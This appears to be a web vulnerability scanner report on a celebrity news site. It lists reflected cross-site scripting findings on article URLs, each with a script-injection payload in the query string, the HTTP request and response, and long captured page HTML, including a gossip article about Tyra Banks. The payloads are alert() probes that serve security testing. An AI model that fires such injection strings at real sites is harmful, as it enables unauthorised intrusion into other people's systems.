document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/thelook_article;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/thelook_article;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/thelook_article;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --><div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div><!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div></div><div class="clearfix"></div><!-- END HEADER --><!-- MAIN CONTENT --><!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/thelook/thelook.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/thelook'><img src='/media/img/channel_page_name_thelook.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"><img src='/media/photo/2011/09/86011/tyra_banks_340_fharrison_121157302_pix.jpg' alt='' /><p class='photo_copyright'></p></div><p class='article'><h3>Say What ...?! Tyra Doesn't Shave Her Legs</h3><p class='publish_date'></p><p class='publish_date'>September 08, 2011</p><p>OOOH Miss Tyra! Former supermodel and super full-of-herself personality Tyra Banks has a beauty secret to spill! She doesn’t shave her legs. Gross!</p><p>The <em>America’s Next Top Model</em> diva extreme tells <a target="_blank" href="http://www.lifeandstylemag.com/"><em>Life &amp; Style</em></a>, &quot;I don't have to shave my legs.” She goes on, &quot;The hair is so faint, you don't even see it.&quot; Uh, sure!</p><p>Who do you think you are Tyra? Mo’Nique!? Shave those legs, lady! I’ve looked at the past year of photos and it doesn’t appear as if Tyra is wearing anything in public that shows bare legs – so I have no proof of such &quot;faint&quot; hair claims. But, the picture forming in my head is not good.</p><p>She admits to the mag that she has shaved in the past: &quot;I used to shave my legs for the Victoria's Secret fashion show . . . and the <em>Sports Illustrated</em> Swimsuit Issue shoot.&quot; Hmm Tyra is now retired from modeling -- so is she just letting her legs get all <em>Harry and the Hendersons</em>?! Evidently, yes.</p><p>I guess Tyra did shave for big fashion events but I am now envisioning a hairy legged Tyra spreading her bizness on glossy magazine pages and strutting her stuff down the catwalk, rocking her wind-in-the-leg-hair look. Shudder to think …</p><p>Do you think you need to shave if you have fine leg hair? Or should you always shave?</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href='http://www.twitter.com/home?status=Say+What+...?!+Tyra+Banks+Doesnt+Shave+Her+Legs+http://theinsider.com/p/?acat56+via+@theinsider' class='twitter-share-button'><img src='/media/img/tweet_png.png' class='video-sm-icons_' style='margin-bottom:-3px'/></a> <!--<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>--> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5><div class="article-more-news-text"><p>In the latest example of my music industry influence, and totally humble mindset, VH1 has selected MUTEMATH (a band I declared <a href="http://www.theinsider.com/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/index.html" target="_blank">you &quot;must-kno... <a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-readmore">more</a></p></a></p><p class="article-more-news-published-info">Published </p><div style="clear:both;"></div></div></div></div><div class="article-more-news-box"><a href="/movies/45571_Haley_Atwell_Talks_Captain_America/index.html"><img src="/media/photo/2011/10/93412/halery_112_paramount.jpg" alt="" class="article-more-news-150thumb" /></a><div c..
- /thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html

/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html

http://www.theinsider.com/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html?'%22--..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0031A3)</script>

Request

GET /thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/tv/47106_Tyra_Banks_on_the_Out_of_This_World_ANTM_Finale/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=299
Date: Tue, 06 Dec 2011 07:12:05 GMT
Content-Length: 13310
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Say What ...?! Tyra Banks Doesn't Shave Her Legs - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="America's Next Top , say what ...?!, sports illustrated, tyra banks" /> <meta name="category" content="thelook" /> <meta name="date" content="2011-09-08 09:20:00" /><meta property="og:title" content="Say What ...?! Tyra Banks Doesn't Shave Her Legs" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/09/86009/tyra_banks_150_fharrison_121157302.jpg" /><meta property="og:description" content="OOOH Miss Tyra! Former supermodel and super full-of-herself personality Tyra Banks has a beauty secret to spill! She doesn't shave her legs. Gross!" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-09-08 09:20:00" /><Attribute name="sdate" value="20110908" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/photo/2011/09/86009/tyra_banks_150_fharrison_121157302.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script type="text/javascript" src="/swfobject.js"></script> <script src="/new_insider/jcapslide.js" type="text/javascript"></script> <link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <style> .ins_fb_text { display: block; left: 2px; position: absolute; top: 42px; } .ad_center { margin: 0 auto; width: 728px; } </style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/thelook_article;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/thelook_article;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/thelook_article;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --><div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div><!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div></div><div class="clearfix"></div><!-- END HEADER --><!-- MAIN CONTENT --><!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/thelook/thelook.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/thelook'><img src='/media/img/channel_page_name_thelook.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"><img src='/media/photo/2011/09/86011/tyra_banks_340_fharrison_121157302_pix.jpg' alt='' /><p class='photo_copyright'></p></div><p class='article'><h3>Say What ...?! Tyra Doesn't Shave Her Legs</h3><p class='publish_date'></p><p class='publish_date'>September 08, 2011</p><p>OOOH Miss Tyra! Former supermodel and super full-of-herself personality Tyra Banks has a beauty secret to spill! She doesn’t shave her legs. Gross!</p><p>The <em>America’s Next Top Model</em> diva extreme tells <a target="_blank" href="http://www.lifeandstylemag.com/"><em>Life &amp; Style</em></a>, &quot;I don't have to shave my legs.” She goes on, &quot;The hair is so faint, you don't even see it.&quot; Uh, sure!</p><p>Who do you think you are Tyra? Mo’Nique!? Shave those legs, lady! I’ve looked at the past year of photos and it doesn’t appear as if Tyra is wearing anything in public that shows bare legs – so I have no proof of such &quot;faint&quot; hair claims. But, the picture forming in my head is not good.</p><p>She admits to the mag that she has shaved in the past: &quot;I used to shave my legs for the Victoria's Secret fashion show . . . and the <em>Sports Illustrated</em> Swimsuit Issue shoot.&quot; Hmm Tyra is now retired from modeling -- so is she just letting her legs get all <em>Harry and the Hendersons</em>?! Evidently, yes.</p><p>I guess Tyra did shave for big fashion events but I am now envisioning a hairy legged Tyra spreading her bizness on glossy magazine pages and strutting her stuff down the catwalk, rocking her wind-in-the-leg-hair look. Shudder to think …</p><p>Do you think you need to shave if you have fine leg hair? Or should you always shave?</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href='http://www.twitter.com/home?status=Say+What+...?!+Tyra+Banks+Doesnt+Shave+Her+Legs+http://theinsider.com/p/?acat56+via+@theinsider' class='twitter-share-button'><img src='/media/img/tweet_png.png' class='video-sm-icons_' style='margin-bottom:-3px'/></a> <!--<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>--> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5><div class="article-more-news-text"><p>In the latest example of my music industry influence, and totally humble mindset, VH1 has selected MUTEMATH (a band I declared <a href="http://www.theinsider.com/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/index.html" target="_blank">you &quot;must-kno... <a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-readmore">more</a></p></a></p><p class="article-more-news-published-info">Published </p><div style="clear:both;"></div></div></div></div><div class="article-more-news-box"><a href="/movies/45571_Haley_Atwell_Talks_Captain_America/index.html"><img src="/media/photo/2011/10/93412/halery_112_paramount.jpg" alt="" class="article-more-news-150thumb" /></a><div c..
- /tv/44947_Happy_Endings_Halloween_episode/

/tv/44947_Happy_Endings_Halloween_episode/

http://www.theinsider.com/tv/44947_Happy_Endings_Halloween_episode/?'%22--%3E%3C/style%3E%3C/script%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0032BC)</script>

Request

GET /tv/44947_Happy_Endings_Halloween_episode/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/tv/44947_Happy_Endings_Halloween_episode/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:12:28 GMT
Content-Length: 13492
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>First Look: 'Happy' Halloween - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="Eliza Coupe, halloween, Happy Endings, TV" /> <meta name="category" content="tv" /> <meta name="date" content="2011-10-07 10:03:00" /><meta property="og:title" content="First Look: 'Happy' Halloween" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/tv/44947_Happy_Endings_Halloween_episode/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/10/90574/happy_150_abc.jpg" /><meta property="og:description" content="When asked about her character's Halloween costume for the October 26 episode of Happy Endings, actress Eliza Coupe told Zap2It, Buckle up for that outfit!" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-07 10:03:00" /><Attribute name="sdate" value="20111007" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/photo/2011/10/90574/happy_150_abc.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script type="text/javascript" src="/swfobject.js"></script> <script src="/new_insider/jcapslide.js" type="text/javascript"></script> <link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <style> .ins_fb_text { display: block; left: 2px; position: absolute; top: 42px; } .ad_center { margin: 0 auto; width: 728px; } </style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/tv_article;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/tv_article;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/tv_article;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
